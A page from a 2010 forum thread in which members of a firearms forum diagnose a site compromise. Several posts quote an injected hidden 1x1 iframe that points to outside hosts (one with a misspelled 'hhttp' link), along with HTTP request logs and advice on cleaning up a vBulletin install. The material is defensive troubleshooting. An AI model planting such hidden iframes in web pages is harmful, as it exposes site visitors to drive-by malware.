ATTN: Webmaster/Everyone - Suspicious/Malicious content from this site

This is a discussion on ATTN: Webmaster/Everyone - Suspicious/Malicious content from this site within the Forum News, Feedback, Problems & Comments forums, part of the DefensiveCarry.com Forum Office category; iframe injection at its best... Google cache page of glocktalk.com At the moment, connection does not pull anything from bbbinvestigation.org GET /ks HTTP/1.1 Host: bbbinvestigation.org ...

Page 7 of 11 FirstFirst ... 34567891011 LastLast
Results 91 to 105 of 161

Thread: ATTN: Webmaster/Everyone - Suspicious/Malicious content from this site

  1. #91
    Member Array swatspyder's Avatar
    Join Date
    May 2009
    Location
    Washington
    Posts
    157
    iframe injection at its best...

    Google cache page of glocktalk.com

    At the moment, connection does not pull anything from bbbinvestigation.org

    GET /ks HTTP/1.1
    Host: bbbinvestigation.org
    User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us,en;q=0.5
    Accept-Encoding: gzip,deflate
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 115
    Connection: keep-alive
    Referer: Merged: Auto Forward to Google/Trojan Warning Issues - Glock Talk


    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 24 Jun 2010 11:00:52 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: keep-alive
    X-Powered-By: PHP/5.1.6
    Content-Length: 0
    Merged: Auto Forward to Google/Trojan Warning Issues - Glock Talk

    Line 459 of their source ( ' <-- added to allow line to be viewed):
    '<'iframe width=1 height=1 border=0 frameborder=0 src="http://bbbinvestigation.org/ks"'>'<'/iframe'>'<'!-- Forum Number: 29 --'>'
    Make sure admins and mods change their passwords, keep vbulletin updated (3.8.5 is out and so is version 4), make sure folder and file permissions are set at 644, and check your .htaccess file.
    Last edited by swatspyder; June 24th, 2010 at 08:07 AM.

  2. Remove Ads

  3. #92
    Member Array swatspyder's Avatar
    Join Date
    May 2009
    Location
    Washington
    Posts
    157
    Line 56 of the source on the home page.
    Line 103 of the source on this page.

    '<'iframe width=1 height=1 border=0 frameborder=0 src="hhttp://poskeheryrggy.com/ks"'>'<'/iframe'>'<'a name="top"'>'<'/a'>'


    Someone is still able to push information to the server..... It's back....

    Even if they could type correctly, there is nothing pulled from their server.
    GET /ks HTTP/1.1
    Host: poskeheryrggy.com
    User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us,en;q=0.5
    Accept-Encoding: gzip,deflate
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 115
    Connection: keep-alive


    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 24 Jun 2010 11:42:01 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: keep-alive
    X-Powered-By: PHP/5.1.6
    Content-Length: 0

    http://www.vbulletin.com/forum/showt...ease-some-tips.
    Hi, this happened to me.

    Upgrade VBSEO if installed
    Look in Avatar and customprofilepics for any files that are not gif or Jpeg. In customeprofile I had a php file

    Then run this mod http://www.vbulletin.org/forum/showt...parse+template

    And you should be OK, hope this helps

  4. #93
    VIP Member Array shockwave's Avatar
    Join Date
    Apr 2010
    Location
    Florida
    Posts
    2,015
    OK, the Tapatalk problem is cleared up. Now I'm getting a new error message:

    Firefox doesn't know how to open this address, because the protocol (hhttp) isn't associated with any program.
    That's a typo in the code somewhere.
    "It may seem difficult at first, but everything is difficult at first."

  5. #94
    Moderator
    Array Bark'n's Avatar
    Join Date
    Apr 2007
    Location
    West Central Missouri
    Posts
    9,917
    I'm getting the exact same thing as shockwave is experiencing since I logged in this morning!

    I sent you a PM regarding the error.

    Firefox doesn't know how to open this address, because the protocol (hhttp) isn't associated with any program.
    When you click the OK button in the error message to close the dialog box, it does take you to the correct page/thread you are attempting to navigate in the first place. However, the same error message pops up each time you click on any link or thread.

    It is also specific to Defensive Carry website. It's not happening on any other website I go to.
    -Bark'n
    Semper Fi


    "The gun is the great equalizer... For it is the gun, that allows the meek to repel the monsters; Whom are bigger, stronger and without conscience, prey on those who without one, would surely perish."

  6. #95
    Member Array swatspyder's Avatar
    Join Date
    May 2009
    Location
    Washington
    Posts
    157
    Quote Originally Posted by shockwave View Post
    OK, the Tapatalk problem is cleared up. Now I'm getting a new error message:



    That's a typo in the code somewhere.
    See the post above yours. It is a misspelled link in an iframe that was injected into the site.

  7. #96
    Ex Member Array HoustonRaven's Avatar
    Join Date
    Apr 2010
    Location
    Houston, TX
    Posts
    118
    Still getting an error message that says:

    Firefox doesn't know how to open this address, because the protocol (hhttp) isn't associated with any program.

    Any ideas? I have to close it every time the page refreshes or when I move on to another page.

  8. #97
    VIP Member Array shockwave's Avatar
    Join Date
    Apr 2010
    Location
    Florida
    Posts
    2,015
    Still the Tapatalk code, apparently. Here's the offending bit:

    iframe width=1 height=1 border=0 frameborder=0 src="hhttp://poskeheryrggy.com/ks"></iframe><a name="top">
    "It may seem difficult at first, but everything is difficult at first."

  9. #98
    Member Array swatspyder's Avatar
    Join Date
    May 2009
    Location
    Washington
    Posts
    157
    Quote Originally Posted by HoustonRaven View Post
    Still getting an error message that says:

    Firefox doesn't know how to open this address, because the protocol (hhttp) isn't associated with any program.

    Any ideas? I have to close it every time the page refreshes or when I move on to another page.
    Everyone is going to have to wait for the server admin to fix the issue with the iframe pointing to a misspelled link. Someone has gained access to the server and has injected a single line into the source code on the server that is causing the error.

    All anyone can do is wait.


    If you would like some semi-technical information, see the 3 posts above that I have made, here on page 5.

  10. #99
    Moderator
    Array Bark'n's Avatar
    Join Date
    Apr 2007
    Location
    West Central Missouri
    Posts
    9,917
    Quote Originally Posted by swatspyder View Post
    Everyone is going to have to wait for the server admin to fix the issue with the iframe pointing to a misspelled link. Someone has gained access to the server and has injected a single line into the source code on the server that is causing the error.

    All anyone can do is wait.


    If you would like some semi-technical information, see the 3 posts above that I have made, here on page 5.
    Whoever "hacked" us should be horsewhipped, then drawn and quartered! Don't they know we all have guns?
    -Bark'n
    Semper Fi


    "The gun is the great equalizer... For it is the gun, that allows the meek to repel the monsters; Whom are bigger, stronger and without conscience, prey on those who without one, would surely perish."

  11. #100
    Senior Member Array SARR001's Avatar
    Join Date
    Jan 2005
    Location
    Look at my login
    Posts
    814

    Firefox iasue

    I got the same uasyes as eveyone else with the popup yesterday. After the fix this morning, all was well.
    Now when I log in, firefox gives me a warning that can't open the application beause it does not recognize it.
    "Life's tough......It's even tougher if you're stupid." -John Wayne

  12. #101
    Senior Member Array SARR001's Avatar
    Join Date
    Jan 2005
    Location
    Look at my login
    Posts
    814
    BTW, none of the other VBulletin forums I am on are affected.
    "Life's tough......It's even tougher if you're stupid." -John Wayne

  13. #102
    Member Array swatspyder's Avatar
    Join Date
    May 2009
    Location
    Washington
    Posts
    157
    Quote Originally Posted by san antone rr View Post
    BTW, none of the other VBulletin forums I am on are affected.
    See posts 90, 91, 92 and 98.

  14. #103
    VIP Member Array tkruf's Avatar
    Join Date
    Feb 2010
    Location
    Really SW, Virginia
    Posts
    4,652
    I'm using Firefox on XP sp3 and get the same Firefox pop up window saying: Firefox doesn't know how to open this address, because the protocol (hhttp) isn't associated with any program.

    The wife's laptop, running Vista will not open the DC Forum site at all. USAcarry also is infected with same problem and on the laptop with vista it brings up Windows Media Player to a blank window. I have not tried USAcarry on the XP run machines.

    Both our XP and Vista computers run Microsoft Security Essentials and it never caught anything.
    NRA Member
    Glock 26 XD9sc
    Ruger SR9c Ruger LCP

  15. #104
    VIP Member
    Array GunnyBunny's Avatar
    Join Date
    Apr 2007
    Location
    Victoria, B.C.
    Posts
    3,961
    Quote Originally Posted by tkruf View Post
    I'm using Firefox on XP sp3 and get the same Firefox pop up window saying cannot open the page "hhttp:..." saying it does not match any application.

    The wife's laptop, running Vista will not open the DC Forum site at all. USAcarry also is infected with same problem and on the laptop with vista it brings up Windows Media Player to a blank window. I have not tried USAcarry on the XP run machines.

    Both our XP and Vista computers run Microsoft Security Essentials and it never caught anything.
    Same thing here.

    I ran an over night scan that found nothing.
    CCW permit holder for Idaho, Utah, Pennsylvania, Maine and New Hampshire. I can carry in your country but not my own.

  16. #105
    VIP Member Array tkruf's Avatar
    Join Date
    Feb 2010
    Location
    Really SW, Virginia
    Posts
    4,652
    Firefox pops up a box every time DC loads a new page saying: Firefox doesn't know how to open this address, because the protocol (hhttp) isn't associated with any program.

    My wife's Vista machine will not even display the DC forum.
    NRA Member
    Glock 26 XD9sc
    Ruger SR9c Ruger LCP

Page 7 of 11 FirstFirst ... 34567891011 LastLast

Links

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

Similar Threads

  1. Loudoun malicious wounding suspect possibly caught...
    By packinnova in forum In the News: The Good, the Bad and the Ugly
    Replies: 1
    Last Post: January 11th, 2011, 12:10 AM
  2. I'm always suspicious...
    By ctsketch in forum Home (And Away From Home) Defense Discussion
    Replies: 27
    Last Post: May 27th, 2010, 10:37 PM
  3. Charged with burglary and malicious wounding and still on the street???
    By DaveH in forum In the News: The Good, the Bad and the Ugly
    Replies: 1
    Last Post: August 26th, 2009, 10:46 AM
  4. William Steele Jr: guilty of aggravated malicious wounding
    By DaveH in forum Law Enforcement, Military & Homeland Security Discussion
    Replies: 8
    Last Post: February 9th, 2009, 06:41 PM
  5. Suspicious Character!
    By Phil Elmore in forum Off Topic & Humor Discussion
    Replies: 11
    Last Post: March 26th, 2006, 09:44 PM

Search tags for this page

73.102.216.1

,
a website with suspicious or malicious content
,
hacked webmaster at bersa.com
,
malicious or suspicious user agents
,
marion lawyer jav
,

suspicious mozilla user-agent typo

,

tapatalk vbseo .htaccess

,

tracert 73.102.216.1

Click on a term to search for related topics.